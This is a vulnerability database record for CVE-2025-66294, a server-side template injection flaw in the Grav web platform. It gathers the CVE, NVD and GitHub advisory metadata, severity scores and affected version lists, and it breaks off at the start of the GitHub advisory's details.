cvelistv5 - CVE-2025-66294

CVE-2025-66294 (GCVE-0-2025-66294)

Vulnerability from cvelistv5

Published

2025-12-01 20:52

Modified

2025-12-02 14:05

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')
CWE-1336 - Improper Neutralization of Special Elements Used in a Template Engine

Summary

Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27.

References

URL

Tags

	security-advisories@github.com	https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458	Patch
	security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	getgrav	grav	Version: < 1.8.0-beta.27

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-66294",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-02T14:05:10.905709Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-02T14:05:20.675Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "grav",
          "vendor": "getgrav",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.8.0-beta.27"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1336",
              "description": "CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-01T20:52:08.533Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f"
        },
        {
          "name": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
        }
      ],
      "source": {
        "advisory": "GHSA-662m-56v4-3r8f",
        "discovery": "UNKNOWN"
      },
      "title": "Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-66294",
    "datePublished": "2025-12-01T20:52:08.533Z",
    "dateReserved": "2025-11-26T23:11:46.393Z",
    "dateUpdated": "2025-12-02T14:05:20.675Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-66294\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-01T21:15:52.843\",\"lastModified\":\"2025-12-04T18:36:15.490\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"},{\"lang\":\"en\",\"value\":\"CWE-1336\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.7.48\",\"versionEndExcluding\":\"1.8.0\",\"matchCriteriaId\":\"EAC8A2F1-9318-4224-9CF5-D3EFE16E81F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*\",\"matchCriteriaId\":\"8A383F2E-C6BA-440B-B648-A3313B7D91C3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*\",\"matchCriteriaId\":\"530C6F64-F30B-4E93-9A12-D9625EA57483\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*\",\"matchCriteriaId\":\"9AC28BF9-626D-4514-91F0-F81DAB5D3602\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*\",\"matchCriteriaId\":\"307AA375-E531-4AE5-BA79-2F9D4DE7A05F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*\",\"matchCriteriaId\":\"C2E3E312-485D-42B0-B465-64B6438CDCAE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*\",\"matchCriteriaId\":\"5BE4B2F9-1B6D-4D18-916A-5C95A3213222\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*\",\"matchCriteriaId\":\"763207F0-92D1-4274-A30A-DE634C5852C3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*\",\"matchCriteriaId\":\"1DE8F350-BA07-4DAA-AE4B-5E0A532B6828\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9150B94-0DF3-43F3-9806-39787A6C0E4D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*\",\"matchCriteriaId\":\"BAA7C7EC-8FB2-445D-8A02-1743D87F5416\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*\",\"matchCriteriaId\":\"7A6BEA2A-D534-4C9E-811A-8A46E214C46D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*\",\"matchCriteriaId\":\"7A644F57-FF39-4262-9796-7C4F3B0851C1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta21:*:*:*:*:*:*\",\"matchCriteriaId\":\"B2AFB9E7-084E-497B-B0FC-CA6A5033C5BF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta22:*:*:*:*:*:*\",\"matchCriteriaId\":\"5C5E8823-9083-4FFA-9897-CAD0340DCE68\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta23:*:*:*:*:*:*\",\"matchCriteriaId\":\"9C048938-E0EC-4AD0-9847-FD74E6770FE2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta24:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7B43876-1445-418A-9707-E692FDF62C4D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta25:*:*:*:*:*:*\",\"matchCriteriaId\":\"94B209DE-01C6-41BA-B912-CF57849A9F7A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:*\",\"matchCriteriaId\":\"AB53AA10-87A5-4010-8019-BF4AA5ABC12B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta3:*:*:*:*:*:*\",\"matchCriteriaId\":\"775E0913-F3EF-4A55-B162-5BF9C6E2E641\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta4:*:*:*:*:*:*\",\"matchCriteriaId\":\"3C3E022E-35CB-40AD-959A-F39949E38BD3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta5:*:*:*:*:*:*\",\"matchCriteriaId\":\"8779C813-A81A-4E21-AB86-6193933568BC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta6:*:*:*:*:*:*\",\"matchCriteriaId\":\"B608EDD4-207A-41A7-A60D-496FDA8EAFEA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta7:*:*:*:*:*:*\",\"matchCriteriaId\":\"AE1F2253-3EE0-4ADD-B8A5-C882A60FC626\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta8:*:*:*:*:*:*\",\"matchCriteriaId\":\"81D4C859-5560-42F1-ACD9-65210E523F28\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:1.8.0:beta9:*:*:*:*:*:*\",\"matchCriteriaId\":\"156707A7-9507-4AC1-9CD0-90E32836E9DF\"}]}]}],\"references\":[{\"url\":\"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-66294\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-02T14:05:10.905709Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-02T14:05:16.576Z\"}}], \"cna\": {\"title\": \"Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass\", \"source\": {\"advisory\": \"GHSA-662m-56v4-3r8f\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.8.0-beta.27\"}]}], \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f\", \"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458\", \"name\": \"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1336\", \"description\": \"CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-01T20:52:08.533Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-66294\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-02T14:05:20.675Z\", \"dateReserved\": \"2025-11-26T23:11:46.393Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-01T20:52:08.533Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

fkie_cve-2025-66294

Vulnerability from fkie_nvd

Published

2025-12-01 21:15

Modified

2025-12-04 18:36

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458	Patch
	security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
getgrav	grav	*
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0
getgrav	grav	1.8.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EAC8A2F1-9318-4224-9CF5-D3EFE16E81F4",
              "versionEndExcluding": "1.8.0",
              "versionStartIncluding": "1.7.48",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*",
              "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*",
              "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*",
              "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*",
              "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*",
              "matchCriteriaId": "C2E3E312-485D-42B0-B465-64B6438CDCAE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*",
              "matchCriteriaId": "5BE4B2F9-1B6D-4D18-916A-5C95A3213222",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*",
              "matchCriteriaId": "763207F0-92D1-4274-A30A-DE634C5852C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*",
              "matchCriteriaId": "1DE8F350-BA07-4DAA-AE4B-5E0A532B6828",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*",
              "matchCriteriaId": "F9150B94-0DF3-43F3-9806-39787A6C0E4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*",
              "matchCriteriaId": "BAA7C7EC-8FB2-445D-8A02-1743D87F5416",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "7A6BEA2A-D534-4C9E-811A-8A46E214C46D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*",
              "matchCriteriaId": "7A644F57-FF39-4262-9796-7C4F3B0851C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta21:*:*:*:*:*:*",
              "matchCriteriaId": "B2AFB9E7-084E-497B-B0FC-CA6A5033C5BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta22:*:*:*:*:*:*",
              "matchCriteriaId": "5C5E8823-9083-4FFA-9897-CAD0340DCE68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta23:*:*:*:*:*:*",
              "matchCriteriaId": "9C048938-E0EC-4AD0-9847-FD74E6770FE2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta24:*:*:*:*:*:*",
              "matchCriteriaId": "F7B43876-1445-418A-9707-E692FDF62C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta25:*:*:*:*:*:*",
              "matchCriteriaId": "94B209DE-01C6-41BA-B912-CF57849A9F7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta26:*:*:*:*:*:*",
              "matchCriteriaId": "AB53AA10-87A5-4010-8019-BF4AA5ABC12B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "775E0913-F3EF-4A55-B162-5BF9C6E2E641",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "3C3E022E-35CB-40AD-959A-F39949E38BD3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "8779C813-A81A-4E21-AB86-6193933568BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta6:*:*:*:*:*:*",
              "matchCriteriaId": "B608EDD4-207A-41A7-A60D-496FDA8EAFEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta7:*:*:*:*:*:*",
              "matchCriteriaId": "AE1F2253-3EE0-4ADD-B8A5-C882A60FC626",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta8:*:*:*:*:*:*",
              "matchCriteriaId": "81D4C859-5560-42F1-ACD9-65210E523F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta9:*:*:*:*:*:*",
              "matchCriteriaId": "156707A7-9507-4AC1-9CD0-90E32836E9DF",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27."
    }
  ],
  "id": "CVE-2025-66294",
  "lastModified": "2025-12-04T18:36:15.490",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-01T21:15:52.843",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        },
        {
          "lang": "en",
          "value": "CWE-1336"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

ghsa-662m-56v4-3r8f

Vulnerability from github

Published

2025-12-02 01:25

Modified

2025-12-02 01:25

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass

Details

Summary

